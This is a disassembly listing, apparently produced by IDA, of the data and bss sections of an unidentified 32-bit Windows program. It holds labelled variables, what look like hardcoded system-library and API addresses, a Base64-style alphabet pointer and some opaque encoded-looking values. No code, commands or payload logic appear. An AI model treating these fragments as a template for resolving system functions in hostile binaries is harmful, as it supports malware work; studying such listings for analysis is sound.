dword_44402C dd 77F82D5Ch ; DATA XREF: sub_43A105+280�w
; sub_43C2C0+59�r
dword_444030 dd 73D9ADFAh ; DATA XREF: sub_43BD90+23C�r
; sub_43BD90+269�r ...
dword_444034 dd 77E6AD34h ; DATA XREF: sub_43A105+1BC�w
dword_444038 dd 77121651h ; DATA XREF: sub_43858C+17�r
; sub_4394DD+9E�w ...
dword_44403C dd 77DD23D7h ; DATA XREF: sub_43C1C6+66�w
; sub_43C3CE+47�r
dword_444040 dd 77D47EC7h ; DATA XREF: sub_439DDE+1EE�w
dword_444044 dd 77121680h ; DATA XREF: sub_43858C+20F�r
; sub_43858C+229�r ...
dword_444048 dd 77D5264Ah ; DATA XREF: sub_439992+2D�r
; sub_439DDE+309�w
dword_44404C dd 0 ; DATA XREF: sub_439B7B+96�w
; sub_43F9F6+535�r
dword_444050 dd 77D441F2h ; DATA XREF: sub_439DDE+BA�w
; sub_43EC0A+308�r
dword_444054 dd 73D9BBAAh ; DATA XREF: sub_439B7B+217�r
; sub_43AF47+369�r ...
align 10h
dword_444060 dd 0 ; DATA XREF: sub_43B622+F2�r
; sub_43C5EA+3C8�r ...
dd 3E7h dup(0)
dword_445000 dd 77E78C17h ; DATA XREF: sub_4399CB+DC�r
; sub_43A105+344�w
dword_445004 dd 77E75E67h ; DATA XREF: sub_43A105+2D4�w
; sub_43BA75+2B3�r ...
dword_445008 dd 77E79908h ; DATA XREF: sub_43A5C3+372�w
; sub_43C507+18�r ...
dword_44500C dd 77E62D7Ah ; DATA XREF: sub_43A105+34�w
dword_445010 dd 77D5C2CCh ; DATA XREF: sub_439DDE+D6�w
; sub_43F6E3+32�r
align 10h
dword_445020 dd 40h dup(0) ; DATA XREF: sub_439B7B+A6�o
; sub_43B523+66�o ...
dword_445120 dd 77C724ACh ; DATA XREF: sub_43B4B3+69�w
; sub_43EC0A+19C�r
align 10h
dword_445130 dd 0 ; DATA XREF: sub_43B622:loc_43B642�r
; sub_43B622+5E�w ...
dd 3E7h dup(0)
dword_4460D0 dd 771C6F69h ; DATA XREF: sub_43B3CC+82�w
; sub_43D6B1+44�r
dword_4460D4 dd 77E6869Bh ; DATA XREF: sub_4399CB+F6�r
; sub_43A105+360�w
dword_4460D8 dd 771C16BAh ; DATA XREF: sub_43B3CC+9E�w
dword_4460DC dd 77D4DC11h ; DATA XREF: sub_439DDE+20A�w
; sub_43EC0A+1D5�r
dword_4460E0 dd 77E684C6h ; DATA XREF: sub_43A105+14C�w
; sub_43AF47+44C�r
align 10h
dword_4460F0 dd 41h dup(0) ; DATA XREF: sub_439B7B+52�o
; sub_439B7B+E2�o ...
dword_4461F4 dd 73D9E660h ; DATA XREF: sub_43EF62+1B9�w
; sub_440F46+4C8�r ...
dword_4461F8 dd 77E7A5FDh ; DATA XREF: sub_4394DD+44�r
; sub_4394DD+60�r ...
align 10h
byte_446200 db 0 ; DATA XREF: sub_43B622+FB�r
; sub_43C5EA+3D1�r ...
align 4
dd 0F9h dup(0)
dword_4465E8 dd 77E79F93h ; DATA XREF: sub_4394DD+D�r
; sub_43969E+D�r ...
dword_4465EC dd 77DD22EAh ; DATA XREF: sub_43C1C6+4A�w
; sub_43C3CE+26�r
dword_4465F0 dd 77DDACABh ; DATA XREF: sub_4397A3+23�r
; sub_43C1C6+A1�w
dword_4465F4 dd 77D4456Bh ; DATA XREF: sub_439DDE+F2�w
dword_4465F8 dd 77E7513Ch ; DATA XREF: sub_43A105+4B6�w
; sub_43F189+12B�r
dword_4465FC dd 77D49951h ; DATA XREF: sub_439DDE+27A�w
; sub_43DB8B+F1F�r ...
dword_446600 dd 77E704FCh ; DATA XREF: sub_439B7B+16�r
; sub_43A105+3EC�w ...
dword_446604 dd 76C69891h ; DATA XREF: sub_44029C+18E�r
; sub_440D4B+54�w
dword_446608 dd 0 ; DATA XREF: sub_43C1AF+3�o
; sub_43C1AF+E�r ...
dword_44660C dd 77E78EAAh ; DATA XREF: sub_43A105+2F0�w
; sub_43D357+4A�r ...
dword_446610 dd 100E0h ; DATA XREF: sub_43EC0A+24D�w
dword_446614 dd 0EE00h ; DATA XREF: sub_43EC0A+273�w
; sub_44029C:loc_440459�r
dword_446618 dd 77D46F5Bh ; DATA XREF: sub_439DDE+82�w
; sub_43EBEC+13�r
dword_44661C dd 77E79A45h ; DATA XREF: sub_43A105+248�w
; sub_43D9B8+186�r ...
dword_446620 dd 0 ; DATA XREF: sub_439B7B+173�w
; sub_439B7B+1D8�w ...
dword_446624 dd 771C1E56h ; DATA XREF: sub_43B3CC+66�w
; sub_43D6B1+5D�r
align 10h
dword_446630 dd 0 ; DATA XREF: sub_4399CB+CE�w
; sub_4399CB+11D�w ...
dd 0FEh dup(0)
dword_446A2C dd 73D9C489h ; DATA XREF: sub_43EF62+BA�w
dword_446A30 dd 0 ; DATA XREF: sub_439B7B+DD�w
dword_446A34 dd 77E79881h ; DATA XREF: sub_43A105+22C�w
; sub_43F3B6+CB�r ...
dword_446A38 dd 73D9C4C5h ; DATA XREF: sub_43EF62+9E�w
dword_446A3C dd 77E777EFh ; DATA XREF: sub_4395A1+8�r
; sub_43A105+408�w ...
dword_446A40 dd 77D48137h ; DATA XREF: sub_439DDE+242�w
; sub_43DB8B+1029�r ...
dword_446A44 dd 77414CDCh ; DATA XREF: sub_439B7B+2F�r
; sub_43C073+22�r ...
align 10h
word_446A50 dw 0 ; DATA XREF: sub_43C5EA+509�w
; sub_43C5EA+534�r ...
align 4
dd 1F3h dup(0)
dword_447220 dd 77D47EE5h ; DATA XREF: sub_439DDE+19A�w
; sub_43EC0A+17D�r
dword_447224 dd 77D49A11h ; DATA XREF: sub_439DDE+9E�w
; sub_43F9F6+528�r
dword_447228 dd 0 ; DATA XREF: sub_439B7B+D2�w
; sub_43D058:loc_43D0E2�r
align 10h
dword_447230 dd 5 dup(0) ; DATA XREF: sub_439B7B+C2�o
; sub_43C5EA+1A0�o ...
dword_447244 dd 77E805D8h ; DATA XREF: sub_4394DD+28�r
; sub_43969E+28�r ...
dword_447248 dd 77E7980Ah ; DATA XREF: sub_43A0EE+F�r
; sub_43A105+1F4�w
dword_44724C dd 73DA018Fh ; DATA XREF: sub_43EF62+19A�w
dword_447250 dd 77C7F85Ah ; DATA XREF: sub_43B4B3+4A�w
; sub_43DB8B+795�r ...
dword_447254 dd 77132EF6h ; DATA XREF: sub_43858C+44�r
; sub_4394DD+BD�w ...
dword_447258 dd 77E75D9Eh ; DATA XREF: sub_43A105+2B8�w
; sub_43BA75+43�r ...
dword_44725C dd 77E61608h ; DATA XREF: sub_43A105+264�w
; sub_43C073+2C�r
dword_447260 dd 41h dup(0) ; DATA XREF: sub_439B7B+7A�o
; sub_439B7B+ED�o ...
dword_447364 dd 77E6BD13h ; DATA XREF: sub_43A105+37C�w
; sub_440F46+14C2�r
align 10h
dword_447370 dd 0 ; DATA XREF: sub_43D6B1+21�w
; sub_43DB8B+7C�r ...
dword_447374 dd 0 ; DATA XREF: sub_43DB8B+495�w
; sub_43DB8B+4AB�r ...
dword_447378 dd 0 ; DATA XREF: sub_43DB8B+54E�w
; sub_43DB8B+621�r ...
dword_44737C dd 0 ; DATA XREF: sub_43DB8B+86F�w
; sub_43DB8B+906�r ...
dword_447380 dd 0 ; DATA XREF: sub_43DB8B+AA5�w
; sub_43DB8B+BD2�r ...
dword_447384 dd 0 ; DATA XREF: sub_43DB8B+B62�w
; sub_43DB8B+C37�r ...
dword_447388 dd 0 ; DATA XREF: sub_43DB8B+D03�w
; sub_43DB8B+D27�r ...
dword_44738C dd 0 ; DATA XREF: sub_43DB8B+EAA�w
; sub_43DB8B+EC8�r ...
dword_447390 dd 0 ; DATA XREF: sub_43DB8B+EFD�w
; sub_43F9F6+5AC�r
dword_447394 dd 0 ; DATA XREF: sub_43DB8B+F4D�w
; sub_43F9F6+5E3�r
dword_447398 dd 0 ; DATA XREF: sub_43DB8B+F9D�w
; sub_43F9F6+617�r
dword_44739C dd 0 ; DATA XREF: sub_43DB8B+FED�w
; sub_43F9F6+64B�r
dd 4A4h dup(0)
dword_448630 dd 77D44200h ; DATA XREF: sub_439DDE+10E�w
; sub_43EC0A+328�r
dword_448634 dd 77E79E34h ; DATA XREF: sub_438324+1C�r
; sub_43A105+210�w
dword_448638 dd 73D9D340h ; DATA XREF: sub_43AE20+B9�r
; sub_43C2C0+66�r ...
dword_44863C dd 77E7A099h ; DATA XREF: sub_43A105+3D0�w
dword_448640 dd 0 ; DATA XREF: sub_439B7B+E8�w
; sub_44006A+165�r
dword_448644 dd 73D9D5E0h ; DATA XREF: sub_43AE20+AB�r
; sub_43EF62+10E�w ...
dword_448648 dd 77E8074Ah ; DATA XREF: sub_4396F6+60�r
; sub_43A105+3B4�w
dword_44864C dd 77D414D4h ; DATA XREF: sub_439DDE+66�w
; sub_43DB8B+537�r ...
dword_448650 dd 77F7E300h ; DATA XREF: sub_43A5C3+38A�w
; sub_43C507+D5�r ...
dword_448654 dd 77E77963h ; DATA XREF: sub_4396F6+71�r
; sub_4399CB+84�r ...
align 10h
dword_448660 dd 0 ; DATA XREF: sub_43B622+2A�r
; sub_43C5EA+431�r ...
dd 3E7h dup(0)
dword_449600 dd 73D9DBA2h ; DATA XREF: sub_43EF62+146�w
dword_449604 dd 77D444F0h ; DATA XREF: sub_439DDE+25E�w
dword_449608 dd 0 ; DATA XREF: sub_43A105+1A0�w
dword_44960C dd 77D5BA26h ; DATA XREF: sub_439DDE+4A�w
; sub_43F9F6+5B3�r ...
off_449610 dd offset byte_41800D ; DATA XREF: sub_43EC0A+268�w
; sub_44029C+1C3�r
dword_449614 dd 77E681EFh ; DATA XREF: sub_43A105+440�w
; sub_43F189+D4�r ...
dword_449618 dd 77DD189Ah ; DATA XREF: sub_43C1C6+82�w
; sub_43C3CE+52�r
dword_44961C dd 77E7C2C4h ; DATA XREF: sub_43A105+398�w
; sub_43EC0A+DB�r ...
dword_449620 dd 77D4A102h ; DATA XREF: sub_439DDE+1B6�w
; sub_43EC0A+18D�r
dword_449624 dd 77E793EFh ; DATA XREF: sub_43A105+114�w
; sub_44047F+4C�r ...
dword_449628 dd 77D43FEDh ; DATA XREF: sub_439DDE+146�w
; sub_43DB8B+EF1�r ...
dword_44962C dd 0 ; DATA XREF: sub_43858C+D7A�r
; sub_439B7B+8B�w
dword_449630 dd 73D92B86h ; DATA XREF: sub_43855F+20�r
; sub_43858C+A47�r ...
dword_449634 dd 73D9E5C5h ; DATA XREF: sub_43858C+39E�r
; sub_43858C+48D�r ...
dword_449638 dd 0 ; DATA XREF: sub_43D357+2FC�r
; sub_43EC0A+28F�w ...
dword_44963C dd 77D651AFh ; DATA XREF: sub_4393B1+23�r
; sub_4393B1+43�r ...
dword_449640 dd 77E77CCEh ; DATA XREF: sub_43A105+184�w
; sub_43D058+1CC�r
dword_449644 dd 77D6ADD7h ; DATA XREF: sub_439DDE+1D2�w
; sub_43F9F6+1DE�r ...
dword_449648 dd 7720C039h ; DATA XREF: sub_4395B8+12�r
; sub_4395B8+32�r ...
dword_44964C dd 73D9D320h ; DATA XREF: sub_43C2C0+E5�r
; sub_43EF62+D6�w
dword_449650 dd 77E6C9E0h ; DATA XREF: sub_4399CB+6E�r
; sub_43A105+328�w
dword_449654 dd 77D45F74h ; DATA XREF: sub_439DDE+162�w
; sub_43DB8B+4C5�r
dword_449658 dd 77D5BB6Ch ; DATA XREF: sub_439DDE+296�w
; sub_43F9F6+4C3�r
dword_44965C dd 77D47D27h ; DATA XREF: sub_439DDE+2B2�w
; sub_43DB8B+4B2�r ...
dword_449660 dd 77F7E21Fh ; DATA XREF: sub_43A5C3+35A�w
; sub_43C507+64�r ...
dword_449664 dd 77E73C49h ; DATA XREF: sub_43A105+18�w
; sub_43BA5C+12�r ...
dword_449668 dd 77E6C0E3h ; DATA XREF: sub_4399CB+96�r
; sub_43A105+30C�w ...
align 10h
dword_449670 dd 40h dup(0) ; DATA XREF: sub_439B7B+F8�o
; sub_439B7B+224�o ...
dword_449770 dd 77E7751Ah ; DATA XREF: sub_43A105+29C�w
; sub_43B622+C�r ...
dword_449774 dd 0 ; DATA XREF: sub_439B7B+A1�w
; sub_43DB8B+3A5�r
dword_449778 dd 77E79424h ; DATA XREF: sub_43A105+478�w
; sub_43BA75+11B�r
dword_44977C dd 77D43DD3h ; DATA XREF: sub_439DDE+2CE�w
; sub_43EC0A+2FE�r
dword_449780 dd 77E71702h ; DATA XREF: sub_43A105+45C�w
; sub_43BA75+D3�r
dword_449784 dd 0 ; DATA XREF: sub_43EBBF+11�r
; sub_43EBBF+19�o ...
dword_449788 dd 77E7A837h ; DATA XREF: sub_43A105+88�w
; sub_43AF47+43�r ...
align 10h
dword_449790 dd 0 ; DATA XREF: sub_4399CB:loc_4399DB�w
; sub_4399CB+4E�r ...
dd 0FEh dup(0)
dword_449B8C dd 77E79D8Ch ; DATA XREF: sub_43A105+DC�w
; sub_43AF47+431�r ...
dword_449B90 dd 77E7AC37h ; DATA XREF: sub_4399CB+16B�r
; sub_439B7B+124�r ...
align 8
dword_449B98 dd 77E7C657h ; DATA XREF: sub_43A105+494�w
; sub_43F189+22�r
dword_449B9C dd 77E78C81h ; DATA XREF: sub_43A105+C0�w
; sub_43D8DE+A3�r ...
dword_449BA0 dd 771214E8h ; DATA XREF: sub_43858C+F1�r
; sub_43858C+527�r ...
dword_449BA4 dd 77D5C13Ah ; DATA XREF: sub_439DDE+17E�w
; sub_43B912+1E�r ...
dword_449BA8 dd 0 ; DATA XREF: sub_4395A1+3�o
; sub_4395A1+E�r ...
dword_449BAC dd 73D9DBAFh ; DATA XREF: sub_43EF62+12A�w
; sub_43F353:loc_43F367�r ...
dword_449BB0 dd 7712151Dh ; DATA XREF: sub_4394DD+82�w
; sub_43C5EA+637�r
dword_449BB4 dd 771C69DCh ; DATA XREF: sub_43B3CC+4A�w
align 10h
dword_449BC0 dd 77FC5460h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_43C507+13�o
; sub_43C507+5F�o ...
_bss ends
; Section 6. (virtual address 0004A000)
; Virtual size : 00001C00 ( 7168.)
; Section size in file : 00001C00 ( 7168.)
; Offset to raw data for section: 0004A000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 44A000h
off_44A000 dd offset sub_442F30 ; DATA XREF: .text:004381B5�r
dword_44A004 dd 0 ; DATA XREF: sub_4381C3+4A�w
; sub_4381C3+64�r
dword_44A008 dd 0 ; DATA XREF: sub_4381C3+38�w
dword_44A00C dd 0 ; DATA XREF: sub_4381C3+5F�w
; sub_4381C3:loc_43823C�r
dword_44A010 dd 0 ; DATA XREF: sub_43825C+57�w
align 8
dd 7325h
aWr: ; DATA XREF: sub_4381C3+3D�o
; sub_4381C3+4F�o ...
unicode 0, <wr>,0
align 4
dd 4 dup(0)
dword_44A034 dd 0 ; DATA XREF: .text:004380F2�w
dword_44A038 dd 0 ; DATA XREF: .text:004380FC�w
; .text:00438117�r ...
dword_44A03C dd 0 ; DATA XREF: .text:00438104�w
dword_44A040 dd 14h dup(0) ; DATA XREF: .text:00438111�o
; .text:0043811F�o
dword_44A090 dd 3 ; DATA XREF: sub_438348+41�r
; sub_438348+15D�r ...
dword_44A094 dd 6 ; DATA XREF: sub_43AF47+32�r
; sub_43AF47+161�r ...
word_44A098 dw 2 ; DATA XREF: sub_43858C+916�r
; sub_43AF47:loc_43B306�r ...
align 4
dword_44A09C dd 5 ; DATA XREF: sub_4399CB+182�r
; sub_43AF47+27B�r ...
dword_44A0A0 dd 4 ; DATA XREF: sub_43858C+90D�r
; sub_4397A3+79�r ...
word_44A0A4 dw 6 ; DATA XREF: sub_43AE20+107�r
; sub_43C5EA+143�r ...
align 4
dword_44A0A8 dd 6 ; DATA XREF: sub_438348+88�r
; sub_43AF47:loc_43B276�r ...
dword_44A0AC dd 1 ; DATA XREF: sub_43858C+737�r
; sub_43858C+A2D�r ...
word_44A0B0 dw 7 ; DATA XREF: sub_43B523+71�r
; sub_43C2C0+D2�r ...
align 4
dword_44A0B4 dd 8 ; DATA XREF: sub_43858C+32B�r
; sub_439857+44�r ...
dword_44A0B8 dd 3 ; DATA XREF: sub_4396F6+14�r
; sub_4396F6+77�r ...
word_44A0BC dw 9 ; DATA XREF: sub_43858C+B74�r
; sub_43A5C3+46�r ...
align 10h
word_44A0C0 dw 2 ; DATA XREF: sub_43858C+4C�r
; sub_43858C+413�r ...
align 4
dword_44A0C4 dd 7 ; DATA XREF: sub_43CCC9+1C�r
; sub_43CCC9+E6�r ...
dword_44A0C8 dd 0 ; DATA XREF: sub_4393B1:loc_439441�r
; sub_43AF47+69�r ...
word_44A0CC dw 7 ; DATA XREF: sub_43858C+3E7�r
; sub_43C434+19�r ...
align 10h
word_44A0D0 dw 7 ; DATA XREF: sub_43AF47+313�r
; sub_43AF47+349�r ...
align 4
dword_44A0D4 dd 6 ; DATA XREF: sub_43858C+8C1�r
; sub_43A974+19�r ...
word_44A0D8 dw 2 ; DATA XREF: sub_43BA75+18D�r
; sub_43C5EA+237�r ...
align 4
dword_44A0DC dd 3 ; DATA XREF: sub_43858C+13D�r
; sub_4397A3+39�r ...
word_44A0E0 dw 1 ; DATA XREF: sub_438348+46�r
; sub_43CCC9+97�r ...
align 4
dword_44A0E4 dd 9 ; DATA XREF: sub_438348:loc_4384A0�r
; sub_43C073+F9�r ...
word_44A0E8 dw 1 ; DATA XREF: sub_4399CB+C2�r
; sub_43AE20+85�r ...
align 4
dword_44A0EC dd 4 ; DATA XREF: sub_439B7B+190�r
; sub_43A5C3+B1�r ...
dword_44A0F0 dd 1 ; DATA XREF: sub_43A5C3+BB�r
; sub_43AF47+380�r ...
dword_44A0F4 dd 7 ; DATA XREF: sub_43858C+73C�r
; sub_43858C+9A6�r ...
dword_44A0F8 dd 7 ; DATA XREF: sub_4399CB+BC�r
; sub_439B7B+178�r ...
word_44A0FC dw 6 ; DATA XREF: sub_43AF47+21�r
; sub_43AF47+38B�r ...
align 10h
word_44A100 dw 3 ; DATA XREF: sub_4384B5+44�r
; sub_43858C+8E4�r ...
align 4
word_44A104 dw 8 ; DATA XREF: sub_43858C+54D�r
; sub_43A5C3+4D�r ...
align 4
dword_44A108 dd 6 ; DATA XREF: sub_438348+10�r
; sub_43963B+48�r ...
dword_44A10C dd 6 ; DATA XREF: sub_43BA75+1D5�r
; sub_43BD90+12C�r ...
dword_44A110 dd 5 ; DATA XREF: sub_43A974+1C8�r
; sub_43AF47+17B�r ...
dword_44A114 dd 8 ; DATA XREF: sub_4399CB+159�r
; sub_43B622+189�r ...
word_44A118 dw 3 ; DATA XREF: sub_4384B5+30�r
; sub_43B622+1EB�r ...
align 4
dword_44A11C dd 5 ; DATA XREF: sub_43C073+B9�r
; sub_43CCC9+16C�r ...
dword_44A120 dd 5 ; DATA XREF: sub_43A5C3+1FD�r
; sub_43CCC9+18B�r ...
word_44A124 dw 6 ; DATA XREF: sub_43858C+7A7�r
; sub_439B7B+67�r ...
align 4
dword_44A128 dd 9 ; DATA XREF: sub_43858C+1F4�r
; sub_43858C+8B7�r ...
dword_44A12C dd 8 ; DATA XREF: sub_4399CB+15F�r
; sub_43ABE3+19A�r ...
word_44A130 dw 3 ; DATA XREF: sub_43858C+55B�r
; sub_43858C+5EA�r ...
align 4
dword_44A134 dd 8 ; DATA XREF: sub_438348+E1�r
; sub_4399CB+FC�r ...
dword_44A138 dd 0 ; DATA XREF: sub_43858C+4F7�r
; sub_43858C+850�r ...
dword_44A13C dd 3 ; DATA XREF: sub_4384B5+59�r
; sub_43858C+5F1�r ...
dword_44A140 dd 9 ; DATA XREF: sub_43858C+B2E�r
; sub_43B622+15�r ...
word_44A144 dw 6 ; DATA XREF: sub_438348+124�r
; sub_43858C+634�r ...
align 4
dword_44A148 dd 2 ; DATA XREF: sub_43858C+5AC�r
; sub_439B7B+14A�r ...
dword_44A14C dd 6 ; DATA XREF: sub_43858C+41A�r
; sub_43ABE3+140�r ...
word_44A150 dw 8 ; DATA XREF: sub_43858C+78F�r
; sub_43858C+AA1�r ...
align 4
dword_44A154 dd 7 ; DATA XREF: sub_43858C+698�r
; sub_43A5C3+242�r ...
dword_44A158 dd 9 ; DATA XREF: sub_438348+82�r
; sub_43858C+9ED�r ...
dword_44A15C dd 9 ; DATA XREF: sub_43CCC9+43�r
; sub_43CE89+C7�r ...
word_44A160 dw 1 ; DATA XREF: sub_43BD90+4D�r
; sub_43D058+16�r ...
align 4
dword_44A164 dd 4 ; DATA XREF: sub_43858C+813�r
; sub_43A974+135�r ...
dword_44A168 dd 0 ; DATA XREF: sub_43858C+767�r
; sub_43858C+81C�r ...
word_44A16C dw 1 ; DATA XREF: sub_43858C+2D�r
; sub_43AF47+89�r ...
align 10h
word_44A170 dw 2 ; DATA XREF: sub_438348+A3�r
; sub_43858C+1E2�r ...
align 4
word_44A174 dw 7 ; DATA XREF: sub_43858C+8F1�r
; sub_43858C+A12�r ...
align 4
word_44A178 dw 4 ; DATA XREF: sub_4396F6+96�r
; sub_43A5C3+21F�r ...
align 4
dword_44A17C dd 5 ; DATA XREF: sub_43858C+8DB�r
; sub_43AE20+CC�r ...
word_44A180 dw 4 ; DATA XREF: sub_43858C+34�r
; sub_43858C+463�r ...
align 4
dword_44A184 dd 2 ; DATA XREF: sub_4384B5:loc_4384F4�r
; sub_43858C+5D7�r ...
dword_44A188 dd 0 ; DATA XREF: sub_43858C+5DD�r
; sub_4393B1+67�r ...
dword_44A18C dd 0 ; DATA XREF: sub_43855F+8�r
; sub_43CCC9:loc_43CE4C�r ...
dword_44A190 dd 2 ; DATA XREF: sub_43D6B1+86�r
; sub_43DB8B+35E�r ...
dword_44A194 dd 9 ; DATA XREF: sub_43858C+256�r
; sub_4393B1+77�r ...
dword_44A198 dd 2 ; DATA XREF: sub_43858C+BE3�r
; sub_43A5C3+2B�r ...
dword_44A19C dd 6 ; DATA XREF: sub_43ABE3+194�r
; sub_43AF47+2A6�r ...
dword_44A1A0 dd 3 ; DATA XREF: sub_43858C+7EA�r
; sub_43A5C3+256�r ...
word_44A1A4 dw 7 ; DATA XREF: sub_438348+CB�r
; sub_43858C+83B�r ...
align 4
dword_44A1A8 dd 2 ; DATA XREF: sub_43858C+663�r
; sub_43858C+8F8�r ...
dword_44A1AC dd 5 ; DATA XREF: sub_43858C:loc_438FCA�r
; sub_439992+1C�r ...
dword_44A1B0 dd 7 ; DATA XREF: sub_43858C:loc_438B93�r
; sub_43B622+1E1�r ...
word_44A1B4 dw 4 ; DATA XREF: sub_43858C+53�r
; sub_4393B1+60�r ...
align 4
dword_44A1B8 dd 5 ; DATA XREF: sub_43858C+7C5�r
; sub_43D357+50�r ...
dword_44A1BC dd 9 ; DATA XREF: sub_43BA75+E4�r
; sub_43CCC9+80�r ...
word_44A1C0 dw 4 ; DATA XREF: sub_43858C+6ED�r
; sub_43BA75:loc_43BB2B�r ...
align 4
dword_44A1C4 dd 5 ; DATA XREF: sub_43858C+786�r
; sub_4393B1+7C�r ...
dword_44A1C8 dd 0 ; DATA XREF: sub_4384B5+52�r
; sub_439B7B+11C�r
dword_44A1CC dd 6 ; DATA XREF: sub_43858C+971�r
; sub_43CC87+12�r ...
dword_44A1D0 dd 7 ; DATA XREF: sub_43858C+27D�r
; sub_4397A3+73�r ...
dword_44A1D4 dd 2 ; DATA XREF: sub_43A5C3+66�r
; sub_43B523+A2�r ...
dword_44A1D8 dd 9 ; DATA XREF: sub_43858C+575�r
; sub_43DB8B+CB5�r ...
word_44A1DC dw 1 ; DATA XREF: sub_438348+12B�r
; sub_43858C+BBD�r ...
align 10h
word_44A1E0 dw 3 ; DATA XREF: sub_43858C+6E6�r
; sub_439B7B+138�r ...
align 4
dword_44A1E4 dd 4 ; DATA XREF: sub_43858C+842�r
; sub_43BA5C�r ...
dword_44A1E8 dd 1 ; DATA XREF: sub_43858C+305�r
; sub_43858C+A9C�r ...
dword_44A1EC dd 8 ; DATA XREF: sub_43858C+CEF�r
; sub_43A974+19D�r ...
word_44A1F0 dw 3 ; DATA XREF: sub_438324+8�r
; sub_4397A3+53�r ...
align 4
dword_44A1F4 dd 4 ; DATA XREF: sub_43858C+B85�r
; sub_43A5C3+8D�r ...
dword_44A1F8 dd 3 ; DATA XREF: sub_43858C+B8B�r
; sub_43A974+170�r ...
word_44A1FC dw 5 ; DATA XREF: sub_438348+9�r
; sub_43AF47+2BD�r ...
align 10h
dword_44A200 dd 5 ; DATA XREF: sub_43858C+88F�r
; sub_43858C+923�r ...
dword_44A204 dd 1 ; DATA XREF: sub_43858C+138�r
; sub_43858C+1BF�r ...
word_44A208 dw 5 ; DATA XREF: sub_438348+109�r
; sub_43ABE3+D�r ...
align 4
dword_44A20C dd 6 ; DATA XREF: sub_4399CB+58�r
; sub_43B523+7E�r ...
dword_44A210 dd 1 ; DATA XREF: sub_43AF47+1B5�r
; sub_43B622+2D3�r ...
dword_44A214 dd 9 ; DATA XREF: sub_4393B1+114�r
; sub_43C5EA+324�r ...
word_44A218 dw 5 ; DATA XREF: sub_43858C+668�r
; sub_439992+15�r ...
align 4
dword_44A21C dd 8 ; DATA XREF: sub_43858C+35D�r
; sub_43858C+8AE�r ...
dword_44A220 dd 4 ; DATA XREF: sub_43ABE3+A3�r
; sub_43C507+6A�r ...
dword_44A224 dd 5 ; DATA XREF: sub_43858C+BD�r
; sub_43858C+4CF�r ...
dword_44A228 dd 3 ; DATA XREF: sub_43BD90+207�r
; sub_43EC0A+87�r ...
word_44A22C dw 7 ; DATA XREF: sub_43858C:loc_4390B3�r
; sub_439B7B+1FD�r ...
align 10h
word_44A230 dw 6 ; DATA XREF: sub_43858C+52D�r
; sub_43858C+7A0�r ...
align 4
dword_44A234 dd 4 ; DATA XREF: sub_4396F6:loc_439784�r
; sub_43A5C3+23D�r ...
dword_44A238 dd 0 ; DATA XREF: sub_439B7B+1A6�r
; sub_43A5C3+1E3�r ...
dword_44A23C dd 5 ; DATA XREF: sub_43963B+43�r
; sub_43A5C3+25E�r ...
word_44A240 dw 2 ; DATA XREF: sub_43858C+3E0�r
; sub_43858C+7F7�r ...
align 4
dword_44A244 dd 4 ; DATA XREF: sub_43AE20+113�r
; sub_43AF47+1C�r ...
dword_44A248 dd 0 ; DATA XREF: sub_43969E+3C�r
; sub_43A5C3+184�r ...
word_44A24C dw 9 ; DATA XREF: sub_43858C+859�r
; sub_43DB8B+1D4�r ...
align 10h
word_44A250 dw 1 ; DATA XREF: sub_43B523+84�r
; sub_43D357+23B�r ...
align 4
dword_44A254 dd 9 ; DATA XREF: sub_43858C+75E�r
; sub_43858C+BB8�r ...
dword_44A258 dd 2 ; DATA XREF: sub_4397A3+93�r
; sub_43CE89+23�r ...
dword_44A25C dd 8 ; DATA XREF: sub_43858C+56F�r
; sub_43858C+7CB�r ...
word_44A260 dw 2 ; DATA XREF: sub_43858C+826�r
; sub_43B622+12D�r ...
align 4
word_44A264 dw 9 ; DATA XREF: sub_43858C+A19�r
; sub_4399CB+13B�r ...
align 4
dword_44A268 dd 4 ; DATA XREF: sub_43858C+19A�r
; sub_43858C+3D0�r ...
dword_44A26C dd 9 ; DATA XREF: sub_43858C+98�r
; sub_439857+7B�r ...
dword_44A270 dd 4 ; DATA XREF: sub_43858C+8CA�r
; sub_4397A3+9F�r ...
dword_44A274 dd 1 ; DATA XREF: sub_43858C+16B�r
; sub_4393B1+C6�r ...
dword_44A278 dd 2 ; DATA XREF: sub_438348+9D�r
; sub_43AE20+51�r ...
word_44A27C dw 4 ; DATA XREF: sub_439857+10�r
; sub_439857+3D�r ...
align 10h
dword_44A280 dd 4 ; DATA XREF: sub_43855F+10�r
; sub_43858C+AF6�r ...
dword_44A284 dd 9 ; DATA XREF: sub_438324+F�r
; sub_43858C+282�r ...
dword_44A288 dd 6 ; DATA XREF: sub_43B523+3E�r
; sub_43C2C0+47�r ...
dword_44A28C dd 6 ; DATA XREF: sub_43858C+166�r
; sub_43858C+713�r ...
dword_44A290 dd 1 ; DATA XREF: sub_43C507+A�r
; sub_43C507+1E�w ...
dword_44A294 dd 77E60000h ; DATA XREF: sub_43A105+C�r
; sub_43A105+28�r ...
dword_44A298 dd 73D90000h ; DATA XREF: sub_43EF62+13�w
; sub_43EF62+2E�w ...
dword_44A29C dd 77D40000h ; DATA XREF: sub_439DDE+13�w
; sub_439DDE+2E�w ...
dword_44A2A0 dd 77C70000h ; DATA XREF: sub_43B4B3+13�w
; sub_43B4B3+2E�w ...
dword_44A2A4 dd 771B0000h ; DATA XREF: sub_43B3CC+13�w
; sub_43B3CC+2E�w ...
dword_44A2A8 dd 77120000h ; DATA XREF: sub_4394DD+13�w
; sub_4394DD+2E�w ...
dword_44A2AC dd 76BB0000h ; DATA XREF: sub_44029C:loc_440418�r
; sub_440D4B+13�w ...
dword_44A2B0 dd 76C60000h ; DATA XREF: sub_43969E+13�w
; sub_43969E+2E�w ...
dword_44A2B4 dd 773D0000h ; DATA XREF: sub_43C26E+13�w
; sub_43C26E+2E�w ...
dword_44A2B8 dd 77DD0000h ; DATA XREF: sub_43C1C6+13�w
; sub_43C1C6+2E�w ...
off_44A2BC dd offset aAbcdefghijklmn ; DATA XREF: sub_43F932:loc_43F9B3�r
; "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm"...
dword_44A2C0 dd 0E860h, 0E9610000h, 2 dup(0) ; DATA XREF: sub_440F46+A4C�o
dword_44A2D0 dd 11h, 0Fh dup(0) ; DATA XREF: sub_439DC4+8�o
dword_44A310 dd 0E1F7EEA5h, 0BFFD7E2Ch, 869AE87Fh, 0CC244082h, 0D76ADDE2h
